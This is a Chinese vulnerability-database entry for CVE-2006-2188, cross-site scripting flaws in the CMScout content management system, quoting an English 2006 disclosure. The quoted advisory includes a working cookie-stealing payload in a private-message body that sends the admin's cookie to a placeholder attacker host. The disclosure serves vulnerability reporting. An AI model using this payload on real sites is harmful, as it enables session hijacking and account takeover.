CMScout 多个跨站脚本攻击(XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195131 漏洞类型 跨站脚本
发布时间 2006-05-02 更新时间 2006-07-27
CVE编号 CVE-2006-2188 CNNVD-ID CNNVD-200605-060
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/17796
https://cxsecurity.com/issue/WLB-2006050035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-060
|漏洞详情
CMScout1.10及之前版本存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助(1)私人信息(PM)中的Body字段,(2)BBCode或(3)论坛帖子,注入任意web脚本或HTML。
|漏洞EXP
Cmscout <= V1.10 multiple XSS attack vectors

Discovered by: Nomenumbra

Date: 5/2/2006

impact:moderate (privilege escalation,possible defacement)

CMScout is a CMS (Content management system) for scouting related groups from around the world.

A CMS is a piece of web software that makes it easy for you to install, and manage a website.

CMScout includes all the features of other major CMS's that are available (Like PHP-Nuke, Mambo, e107, etc.).

Added news items and events are properly filtered for potential XSS input, input in the forums and PM's however, is not.

For example, when one would send a pm to the admin like this:

Subject: whatever

Body: <script>window.navigate('http://www.evilhost.com/cookiestealer.php?c='+d
ocument.cookie)</script>

we could obtain the admin's cookie. The inside of BBcode isn't filtered either. This goes for the forums too.

Nomenumbra/[0x4F4C]
|受影响的产品
CMScout CMScout 1.10
|参考资料

来源:BID
名称:17796
链接:http://www.securityfocus.com/bid/17796
来源:OSVDB
名称:25247
链接:http://www.osvdb.org/25247
来源:OSVDB
名称:25246
链接:http://www.osvdb.org/25246
来源:BUGTRAQ
名称:20060502Cmscout<=V1.10multipleXSSattackvectors
链接:http://www.securityfocus.com/archive/1/archive/1/432725/100/0/threaded
来源:SECTRACK
名称:1016023
链接:http://securitytracker.com/id?1016023
来源:SECUNIA
名称:19933
链接:http://secunia.com/advisories/19933
来源:XF
名称:cmscout-messageform-xss(26223)
链接:http://xforce.iss.net/xforce/xfdb/26223
来源:SREASON
名称:838
链接:http://securityreason.com/securityalert/838